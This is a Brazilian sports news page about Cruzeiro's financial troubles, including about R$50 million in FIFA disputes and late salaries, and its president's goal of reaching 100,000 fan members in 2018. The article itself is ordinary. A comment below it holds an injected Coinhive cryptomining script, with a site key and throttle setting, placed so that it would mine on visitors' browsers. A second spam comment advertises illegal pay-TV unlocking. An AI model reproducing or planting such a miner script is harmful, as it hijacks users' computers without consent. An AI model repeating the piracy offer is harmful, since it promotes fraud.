logo

31/1/2018 08:50

Cruzeiro admite "peso" com dívidas e projeta 100 mil sócios ainda em 2018

Clube mineiro ainda resolve questões na Fifa e busca aumentar programa de sócios

Cruzeiro admite peso com dívidas e projeta 100 mil sócios ainda em 2018
Wagner Pires de Sá comentou sobre a situação do Cruzeiro (Foto: Washington Alves/Light Press)

Atualmente com cerca de 40 mil sócios adimplentes, mas com 69 mil aproximadamente inscritos em seu programa, o Cruzeiro traçou uma meta ousada: chegar aos 100 mil sócios até a metade de 2018. Com o dinheiro, o clube espera trazer um grande reforço na janela do meio do ano e também equilibrar as contas que não andam bem desde o final do ano passado.



Nós estamos fazendo um esforço, com promoções e eventos, e queremos que, até meados deste ano, nós tenhamos 100 mil torcedores - disse o presidente cruzeirense, Wagner Pires de Sá.

Na próxima semana, o clube mineiro deverá anunciar uma reformulação no programa de sócio-torcedor, com a criação de outras modalidades e benefícios para que possa atrair mais cruzeirenses. A nova diretoria acredita que, tendo nove milhões de torcedores, o Cruzeiro tem plenas condições de conseguir alcançar a meta.

Para Wagner Pires, tendo uma equipe forte, agora o torcedor precisa ajudar para conseguir manter a equipe cruzeirense.

Cruzeiro quer aumentar o número de sócios (Foto: Washington Alves/Light Press)

- Nós temos que ganhar títulos, e só se ganha títulos com uma equipe forte, bem formada, e nós não queremos desmanchar a equipe. Todo o nosso esforço tem sido, até agora, para manter o grupo vencedor, completamos com os jogadores que a gente precisava. Então, o nosso maior empresário é o nosso torcedor. Se nós aumentarmos, chegarmos a 100 mil, vamos ter renda para acertar todos os problemas e ganharmos títulos - garantiu o presidente cruzeirense.

"Peso"

Os problemas financeiros do Cruzeiro - tanto na Fifa (chegam a R$ 50 milhões), os atrasos de salário que ocorreram no ano passado e também com a alta folha salarial do clube - preocupam o presidente cruzeirense.

- Nós, infelizmente, recebemos um passivo muito grande. Estamos discutindo as coisas na Justiça. Nós já temos algum tempo em alguns processos, em outros a gente tem discutido com os empresários, os jogadores para resolver da melhor forma. De alguma maneira, nós temos que resolver as coisas. É um peso que vem em cima do clube e não pode deixar que chega ao nível de perturbar a nossa equipe nessa caminhada, que é longa e muito difícil.

2202 visitas - Fonte: Globo Esporte




(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.